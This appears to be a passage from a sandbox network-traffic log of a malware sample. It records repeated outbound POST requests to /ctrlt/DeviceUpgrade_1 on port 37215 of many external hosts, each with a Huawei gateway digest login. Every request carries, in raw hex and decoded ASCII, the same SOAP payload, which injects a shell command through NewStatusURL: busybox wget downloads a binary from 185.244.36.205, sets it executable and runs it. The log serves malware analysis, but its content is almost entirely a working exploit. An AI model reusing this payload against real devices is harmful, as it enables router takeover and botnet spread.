                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              408192.168.2.154596294.123.158.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718816042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              409192.168.2.154122631.229.23.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718835115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              410192.168.2.1546468138.159.196.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718868971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              411192.168.2.1538058197.24.81.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718872070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              412192.168.2.1546178121.87.33.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718883038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              413192.168.2.1553000181.185.50.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718899965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              414192.168.2.1545200181.75.144.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718939066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              415192.168.2.1545494222.177.136.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718952894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              416192.168.2.1545838102.209.9.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718974113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              417192.168.2.1539662197.107.162.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718977928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
